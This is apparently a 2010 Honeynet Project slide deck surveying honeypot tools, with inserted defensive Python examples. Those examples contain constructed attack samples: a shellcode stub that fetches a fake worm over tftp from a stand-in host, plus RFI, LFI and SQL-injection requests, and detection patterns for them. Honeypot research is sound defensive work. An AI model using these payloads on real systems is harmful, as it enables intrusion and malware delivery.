Honeypots
Use to Know Your Enemies
Adel Karimi, The Honeynet Project
Nov 14, 2010
Speaker
Adel Karimi
Member of The Honeynet Project (Iranian Chapter Lead)
Editor-in-chief of Snoop Security Ezine
M.S. Student @ Tehran Polytechnic
…
Agenda
• About The Honeynet Project
• Introduction to Honeypot
• High-Interaction Honeypots
• Low-Interaction Honeypots
• Client Honeypots
The Honeynet Project
• Founded in 1999, The Honeynet Project is an
international, non-profit research organization
dedicated to improving the security of the Internet at
no cost to the public.
• We accomplish this goal in the following three ways:
– Awareness - We raise awareness of the threats and
vulnerabilities that exist in the Internet today
– Information - For those who are already aware and
concerned, we provide details to better secure and defend
your resources
– Tools
~ 40 International Chapters
Iranian Honeynet Chapter
Honeynet Project Challenges
• Learn about threats, analyze attacks, and share findings.
//honeynet.org/challenges
• Past Challenges:
– Challenge 6 - Analyzing Malicious Portable Destructive Files
– Challenge 5 - Log Mysteries
– Challenge 4 - VoIP
– Challenge 3 - banking troubles
– Challenge 2 - browsers under attack
– Challenge 1 - pcap attack trace
Honeypots
• Definition: A honeypot is a security
resource whose value lies in being probed,
attacked, or compromised.
- Lance Spitzner
• Has no production value, anything going to
or from a honeypot is likely a probe, attack
or compromise
Honeypots
• Uses of honeypots
– Slowing down and following incoming attackers
– Catching and analyzing 0-days, malware, botnets, and so on
– Improving intrusion detection systems
• SurfIDS
• Nebula (An Intrusion Signature Generator)
“To learn the tools, tactics and motives involved in
computer and network attacks.”
SurfIDS
Features:
• Distributed sensors
• Central honeypot deployment
• Central logging
Honeypots
• Honeypot vs. IDS
• Honeynet:
– A network of [High-Interaction] honeypots
– Main requirements:
• Data Control
• Data Capture
• Data Analysis
• Data Collection
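Data Control is the requirement that matters most for safety: once a high-interaction honeypot is compromised, the gateway must stop it from being used against third parties while still letting attackers in. The Honeywall described later enforces this at the bridge with IPtables and Snort_inline. The following is an added example, not Honeywall's code: a Python model of an outbound-connection budget per honeypot and per protocol inside a sliding window. The honeypot addresses and the per-window limits are assumptions chosen for the example.

```python
"""Outbound-connection limiting as a data-control policy for a honeynet gateway.

Added example, not Honeywall's code.  Inbound traffic to a honeypot is always
allowed, because it is the activity to be captured; outbound connections are
counted per honeypot and per protocol inside a sliding window and dropped once
the budget is spent.  Addresses and limits are assumptions for the example.
"""
from collections import defaultdict, deque

HONEYPOTS = {"10.0.0.10", "10.0.0.11"}        # assumed honeypot addresses behind the gateway
LIMITS = {"tcp": 15, "udp": 20, "icmp": 50}  # assumed outbound connections allowed per window
WINDOW = 3600                                 # sliding window length in seconds


class DataControl:
    def __init__(self, honeypots=HONEYPOTS, limits=LIMITS, window=WINDOW):
        self.honeypots = honeypots
        self.limits = limits
        self.window = window
        # (honeypot, proto) -> timestamps of outbound connections still inside the window
        self.history = defaultdict(deque)
        self.log = []                        # dropped connections, for the analyst

    def decide(self, ts, src, dst, proto):
        """Return 'ALLOW' or 'DROP' for a new connection first seen at time ts (seconds)."""
        if src not in self.honeypots:
            return "ALLOW"                   # inbound: let the attacker reach the honeypot
        recent = self.history[(src, proto)]
        while recent and ts - recent[0] >= self.window:
            recent.popleft()                 # forget connections older than the window
        limit = self.limits.get(proto, 0)    # unknown protocols get no outbound budget at all
        if len(recent) >= limit:
            self.log.append(f"{ts} DROP outbound {proto} {src} -> {dst} ({limit}/window reached)")
            return "DROP"
        recent.append(ts)
        return "ALLOW"


def simulate():
    """Constructed traffic: one inbound probe, then a compromised honeypot trying to scan out."""
    dc = DataControl()
    decisions = [dc.decide(0, "198.51.100.7", "10.0.0.10", "tcp")]          # attacker -> honeypot
    decisions += [dc.decide(10 * i, "10.0.0.10", "203.0.113.5", "tcp")      # honeypot -> victims
                  for i in range(17)]
    decisions.append(dc.decide(3700, "10.0.0.10", "203.0.113.5", "tcp"))   # budget partly refreshed
    return decisions, dc.log


if __name__ == "__main__":
    decisions, log = simulate()
    print(decisions)
    print("\n".join(log))
```

The log entries are the interesting output for an analyst: a honeypot that suddenly exhausts its outbound budget has almost certainly been compromised, which is exactly the signal Data Capture and Data Analysis then pick up.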
Types of Honeypots
• Production vs. Research honeypots:
– Production honeypots protect an organization,
while research honeypots are used to learn.
• Different Types:
– High-Interaction
• Real environment
– Low-Interaction
• Simulated resource(s)
• Physical vs. Virtual !?
High-Interaction Honeypots
• Honeywall
– For capturing, controlling and analyzing attacks
– It creates an architecture that allows you to deploy both LI and HI honeypots, but is designed primarily for HI.
– Layer 2 bridging device (Based on CentOS 5)
– Tools:
• IPtables
• Snort_inline
• Snort
• Hflow
• P0f
• Argus
• Sebek
• Walleye
Honeywall
Walleye web interface
High-Interaction Honeypots
• SEBEK
– For “data capture”
– Hidden kernel module that captures all
activities
High-Interaction Honeypots
• Qebek (QEMU Sebek)
– A QEMU-based HI honeypot monitoring tool which aims at improving the invisibility of monitoring the attackers' activities in HI honeypots.
– Two techniques: virtual machine introspection (VMI) and system view reconstruction (SVR).
– VMI enables the IDS or other security system to monitor system events from outside the virtual machine, while SVR allows the monitoring system to reconstruct meaningful high-level OS information from the raw hardware-level information generated by VMI.
• Read the recently published KYT paper, "Qebek - Conceal the Monitoring". The paper is available from http://honeynet.org/papers/KYT_qebek
Low-Interaction Honeypots
• Honeyd
– Written by Niels Provos in 2002.
– Available at www.honeyd.org
Features:
• Simulates thousands of virtual hosts at the same time
• Configuration of arbitrary services via simple configuration file
• Simulates operating systems at TCP/IP stack level
• Tarpit
• Dynamic templates
• Subsystem virtualization:
– Run real UNIX applications under virtual Honeyd IP addresses
Low-Interaction Honeypots
• Nepenthes
– Nepenthes is a versatile tool to collect
malware. It acts passively by emulating
known vulnerabilities and downloading
malware trying to exploit these vulnerabilities. (Excerpt from Nepenthes website)
– Nepenthes is outdated
• Do not use Nepenthes, use Dionaea instead.
• Read why: http://carnivore.it/2009/10/27/introducting_dionaea
• PHARM is a client/server tool to manage, report on and analyze all your distributed nepenthes instances from one interface.
Low-Interaction Honeypots
• Mwcollect
– mwcollectd is a versatile malware collection daemon, uniting the best features of nepenthes and honeytrap.
Low-Interaction Honeypots
• Dionaea
– Nepenthes successor
– Dionaea's intention is to trap malware exploiting vulnerabilities exposed by services offered to a network.
• Features:
– Static state machines to emulate vulnerable services
– Pattern matching to extract values from shellcode
– Download copies of the attacking worm
– Store on disk, or submit to a sandbox
Dionaea
• Features:
– Implements the required parts of the SMB protocol
– Uses libemu (beyond pattern matching)
– Fewer services, better emulation and better logging.
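The four Dionaea features above form one pipeline: a static state machine keeps the attacker's exploit talking, pattern matching on the captured payload recovers the download instruction, and the sample is stored and deduplicated by hash. The following is an added example, not dionaea or nepenthes code, showing that pipeline end to end. It assumes a fictitious line-based service rather than SMB, handles only a single-byte XOR decoder (real shellcode needs libemu), and takes the download function as a parameter so it runs offline; the session and the "worm" below are constructed for the example.

```python
"""Low-interaction capture pipeline: static service state machine, shellcode
pattern matching, and a hash-keyed binary store.

Added example, not dionaea or nepenthes code.  The emulated service is an
assumed line-based daemon (not SMB), the decoder search covers single-byte XOR
only, and downloads go through an injected callable so the example runs offline.
"""
import hashlib
import re


class EmulatedService:
    """Static state machine: AUTH -> CMD -> EXPLOITED.

    Every state answers with a plausible banner so the exploit keeps running.
    Real emulators match exact request structures; this one reduces the CMD
    state to known-vs-unknown commands and keeps everything unknown as payload.
    """
    BANNER = b"220 fileserv 2.1 ready\r\n"

    def __init__(self):
        self.state = "AUTH"
        self.payload = b""

    def feed(self, data):
        if self.state == "AUTH":
            if data.upper().startswith(b"USER "):
                self.state = "CMD"
                return b"331 user ok, send command\r\n"
            return b"530 login first\r\n"
        if self.state == "CMD" and data.upper().startswith((b"LIST", b"QUIT")):
            return b"150 no files\r\n"
        self.state = "EXPLOITED"          # anything else is treated as the exploit
        self.payload += data              # shellcode stages arrive here too
        return b"200 ok\r\n"              # never reveal the parse failure


URL_RE = re.compile(rb"(?:https?|ftp)://[\x21-\x7e]+")
TFTP_RE = re.compile(rb"tftp(?:\.exe)?\s+-i\s+(\d{1,3}(?:\.\d{1,3}){3})\s+get\s+([\w.\-]+)", re.I)


def extract_download(payload):
    """Return (kind, target, xor_key) for the first download instruction found, else None.

    Key 0 is the plaintext search; the other keys brute-force a single-byte XOR
    decoder, which is as far as pattern matching gets before libemu is needed.
    """
    for key in range(256):
        data = payload if key == 0 else bytes(b ^ key for b in payload)
        m = TFTP_RE.search(data)
        if m:
            return "tftp", f"{m.group(1).decode()}/{m.group(2).decode()}", key
        m = URL_RE.search(data)
        if m:
            return "url", m.group(0).decode(), key
    return None


class BinaryStore:
    """Downloads samples through an injected fetcher and deduplicates by SHA-256."""

    def __init__(self, fetch):
        self.fetch = fetch                # fetch(kind, target) -> bytes
        self.samples = {}                 # sha256 -> content (what would go to disk or a sandbox)
        self.seen = []                    # (sha256, source) per download, duplicates included

    def collect(self, kind, target):
        content = self.fetch(kind, target)
        digest = hashlib.sha256(content).hexdigest()
        new = digest not in self.samples
        self.samples.setdefault(digest, content)
        self.seen.append((digest, f"{kind}:{target}"))
        return digest, new


def handle_session(client_messages, store):
    """Run one client session through the service and the download pipeline."""
    svc = EmulatedService()
    for msg in client_messages:
        svc.feed(msg)
    found = extract_download(svc.payload) if svc.payload else None
    if not found:
        return {"payload_bytes": len(svc.payload), "download": None}
    kind, target, key = found
    digest, new = store.collect(kind, target)
    return {"payload_bytes": len(svc.payload), "download": (kind, target),
            "xor_key": key, "sha256": digest, "new": new}


# Constructed sample traffic: a login, then an oversized command carrying a tftp download stub.
SAMPLE_SESSION = [b"USER anonymous\r\n",
                  b"RETR " + b"A" * 300 + b"\x90\x90cmd /c tftp -i 203.0.113.9 get svchost32.exe\x00"]
SAMPLE_FILES = {"tftp:203.0.113.9/svchost32.exe": b"MZ\x90\x00constructed-fake-worm"}


def offline_fetch(kind, target):
    return SAMPLE_FILES.get(f"{kind}:{target}", b"")


if __name__ == "__main__":
    store = BinaryStore(offline_fetch)
    print(handle_session(SAMPLE_SESSION, store))
    print(handle_session(SAMPLE_SESSION, store))   # same sample again: new is False
```

The `seen` list versus the `samples` dict is the point of the store: a worm hitting the sensor a thousand times yields one binary on disk but a thousand records of where it came from, which is the data the botnet-tracking use case needs.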
Low-Interaction Honeypots
• Amun
– A Python honeypot
– Basically a nepenthes port to Python
Amun
• A sample of collected attack data from Amun:
Amun
DEMO
//Using Metasploit to Launch an Attack against Amun (MS08-067)
Source: http://amunhoney.sourceforge.net
Low-Interaction Honeypots
• A new approach..
• Glastopf
– A dynamic, LI web-app honeypot
– A minimalistic web server written in Python
– Collects information about web application-based attacks like RFI, SQL injection, and LFI
– Glastopf scans the incoming request for strings like "=http://" or "=ftp://", tries to download and analyze the referenced file, and responds as closely as possible to the attacker's expectations
– The attacker sends us, for example, a bot, shell or spreader
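The three attack classes above are recognised from parameter values: an RFI attempt carries a remote URL as a parameter, an LFI attempt a path traversal or a sensitive local file, and SQL injection the usual quote-and-keyword shapes. The following is an added example, not Glastopf's code: request triage that parses raw request lines, classifies the parameters and, for RFI, extracts the URL and fetches the file through an injected function so it runs offline. The request lines and the "remote file" are constructed for the example.

```python
"""Request triage for a low-interaction web-application honeypot.

Added example, not Glastopf's code.  Parses raw HTTP request lines, classifies
parameter values as RFI, LFI or SQL injection and, for RFI, pulls the file the
attacker wants included through an injected fetcher.  Requests are constructed.
"""
import hashlib
import re
from urllib.parse import parse_qsl, unquote, urlsplit

RFI_RE = re.compile(r"^(?:https?|ftp)://", re.I)          # the "=http://" / "=ftp://" shape
LFI_RE = re.compile(r"\.\./|\.\.\\|/etc/passwd|/proc/self/environ|\x00", re.I)
SQLI_RE = re.compile(r"['\"]\s*(?:or|and)\s+|union\s+(?:all\s+)?select|sleep\(|benchmark\(|--\s*$", re.I)


def parse_request_line(line):
    """'GET /index.php?page=http://x/s.txt? HTTP/1.1' -> (method, path, [(name, value), ...]).

    Values are decoded twice on purpose: attackers double-encode (%252e%252e/) to slip
    past naive filters, and the honeypot wants to see what the real application would.
    """
    method, target, _version = line.split(" ", 2)
    parts = urlsplit(target)
    params = [(name, unquote(value))
              for name, value in parse_qsl(parts.query, keep_blank_values=True)]
    return method, parts.path, params


def classify(params):
    """Return (attack_type, evidence); RFI wins over LFI over SQLi when several match."""
    for name, value in params:
        if RFI_RE.match(value):
            return "rfi", value
    for name, value in params:
        if LFI_RE.search(value):
            return "lfi", f"{name}={value}"
    for name, value in params:
        if SQLI_RE.search(value):
            return "sqli", f"{name}={value}"
    return "benign", None


def handle(line, fetch):
    """Triage one request and, for RFI, fetch and fingerprint the remote file."""
    method, path, params = parse_request_line(line)
    kind, evidence = classify(params)
    record = {"method": method, "path": path, "type": kind, "evidence": evidence,
              "status": 200}      # always answer 200: an error page would give the honeypot away
    if kind == "rfi":
        content = fetch(evidence)
        record["sha256"] = hashlib.sha256(content).hexdigest()
        record["sample_bytes"] = len(content)
    return record


def triage(lines, fetch):
    return [handle(line, fetch) for line in lines]


# Constructed requests of the kinds the slide lists, plus one benign request.
SAMPLE_REQUESTS = [
    "GET /index.php?page=http://203.0.113.20/r57.txt? HTTP/1.1",
    "GET /index.php?page=%252e%252e/%252e%252e/etc/passwd%00 HTTP/1.1",
    "GET /news.php?id=1%27%20UNION%20SELECT%201,2,3-- HTTP/1.1",
    "GET /index.php?page=about HTTP/1.1",
]
SAMPLE_REMOTE_FILES = {"http://203.0.113.20/r57.txt?": b"<?php /* constructed stand-in for a PHP shell */ ?>"}


def offline_fetch(url):
    return SAMPLE_REMOTE_FILES.get(url, b"")


if __name__ == "__main__":
    for record in triage(SAMPLE_REQUESTS, offline_fetch):
        print(record)
```

The trailing "?" on the RFI URL is kept as evidence on purpose: it is how RFI payloads neutralise whatever suffix the vulnerable include statement appends, and its presence is a strong hint that the request is an attack rather than a mistyped link.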
Client Honeypots
• What is a HoneyClient!?
• Drive-by Download Attacks
Source: http://www.honeynet.org/papers/mw
Source: Canadian Honeynet Project
Other Types of Honeypots
• WiFi Honeypot
• VoIP Honeypot
– VoIP Honey
– Artemisa
• SSH Honeypot
– Kippo
– Kojoney
• …
Conclusion
• You can use honeypots to know your enemies..!
– Collecting malware
– Tracking botnets
– …
Virtual Honeypots: From Botnet
Tracking to Intrusion Detection
By Niels Provos, Thorsten Holz
Use Honeypots to Know Your Enemies
By Adel Karimi, Iranian Honeynet Chapter, adel.net at Gmail.com
Thank You..
?